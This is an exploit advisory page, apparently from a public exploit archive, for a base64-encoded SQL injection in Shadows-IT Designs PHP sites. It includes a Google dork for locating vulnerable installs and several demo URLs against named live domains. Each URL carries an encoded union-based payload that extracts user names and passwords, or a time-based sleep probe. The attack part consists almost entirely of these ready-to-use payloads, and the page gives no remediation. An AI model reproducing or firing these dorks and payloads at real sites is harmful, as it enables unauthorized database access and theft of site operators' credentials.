Shadows-IT Designs Base64_Encoded SQL Injection (Time & Union Based)

2016.02.11

Credit: Ashiyane Digital Security Team

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: "intext:Powerd By Shadows-IT" inurl:?.php?page=

######################
# Exploit Title : Shadows-IT Designs Base64_Encoded SQL Injection (Time & Union Based)
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.shadows-it.com/
# Google Dork : "intext:Powerd By Shadows-IT" inurl:?.php?page=
# Date: 10 Feb 2016
# Tested On : Windows 10 , Kali linux
#################################
# Exploit And Demo:
# Vulnerable PHP File = index.php
# Vulnerable Parameter = id
#
# Attack Like : Site.com/index.php?page=cGFnZXM=&op=ZGlzcGxheV9wYWdlcw==&id= --> Base64_Encoded SQLi <--
#
#################################
# Demos :
# Union Based:
# http://www.ekhaa.org.sa/index.php?page=bmV3cw==&op=ZGlzcGxheV9uZXdzX2RldGFpbHNfdQ==&news_id=bnVsbCBVbmlPTiBTZWxlQ3QgZ3JvdXBfY29uY2F0KDB4M2MyZjc0Njk3NDZjNjUzZSxjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lIGxpa2UgIDB4NzM3NDVmNzU3MzY1NzItLQ==
#
# http://techpro.com.sa/index.php?page=bmV3cw==&op=ZGlzcGxheV9uZXdz&id=bnVsbCBVbmlPTiBTZWxlY3QgMSwyLGdyb3VwX2NvbmNhdCh1c2VyX25hbWUsMHg3ZTdlN2UzZSx1c2VyX3Bhc3N3b3JkKSw0LDUsNiw3LDggZnJvbSBzdF91c2Vy
#
# Time Based :
#
# http://saidomari.com/index.php?page=cGFnZXM=&op=ZGlzcGxheV9wYWdlcw==&id=MjcgYW5kIGlmKHN1YnN0cmluZyh2ZXJzaW9uKCksMSwxKSBsaWtlIDUsc2xlZXAoNSksMSk=
#
# http://www.naseh.info/index.php?page=Y291cnNl&op=ZGlzcGxheV9jb3Vyc2VfZGV0YWlscw==&id=NyBhbmQgaWYoc3Vic3RyaW5nKHZlcnNpb24oKSwxLDEpIGxpa2UgNSxzbGVlcCg1KSwxKQ==
#
# http://www.alroshod.com/index.php?page=cGhvdG9fZ2FsbGVyeQ==&op=ZGlzcGxheV9waG90b19nYWxsZXJ5X2RldGFpbHM=&id=NDcgYW5kIGlmKEBAdmVyc2lvbiBub3QgIGxpa2UgJzUlJyxzbGVlcCg1KSxudWxsKQ==&lan=YXI=
#
# http://www.mod.com.sa/index.php?page=cHJvZHVjdA==&op=ZGlzcGxheV9wcm9kdWN0X2RldGFpbHM=&id=MzUgYW5kIGlmKEBAVmVyc2lvbiBsaWtlIDB4MzUyNSxzbGVlcCg1KSxudWxsKQ==&lan=ZW4=
#
# http://www.odc.com.sa/index.php?page=cGFnZXM=&op=ZGlzcGxheV9wYWdlcw==&id=MjggYW5kIGlmKEBAVmVyc2lvbiBsaWtlIDB4MzUyNSxzbGVlcCg1KSxudWxsKQ==
#
# http://www.futurepower-sy.com/index.php?page=cHJvZHVjdF9jYXRlZ29yeQ==&op=ZGlzcGxheV9wcm9kdWN0X2NhdA==&id=NTMgYW5kIGlmKEBAdmVyc2lvbiBsaWtlIDB4MzUyNSxzbGVlcCg1KSxudWxsKQ==&lan=ZW4=
#
# http://admusavirlik.com/new/index.php?page=cGFnZXM=&op=ZGlzcGxheV9wYWdlcw==&id=NDcgYW5kIGlmKEBAdmVyc2lvbiBsaWtlIDB4MzUyNSxzbGVlcCg1KSxudWxsKQ==&lan=ZW4=
#
# http://mahrouseh.com/index.php?page=cHJvZHVjdA==&op=ZGlzcGxheV9wcm9kdWN0X2NhdA==&id=NiBhbmQgaWYoQEB2ZXJzaW9uIG5vdCBsaWtlIDB4MzUyNSxzbGVlcCg1KSxudWxsKQ==&lan=YXI=
#
######################
# discovered by : Ac!D
# TnX : Mahdi.Hidden , H_empire
######################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Shadows-IT Designs Base64_Encoded SQL Injection (Time & Union Based)

Dork: "intext:Powerd By Shadows-IT" inurl:?.php?page=

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.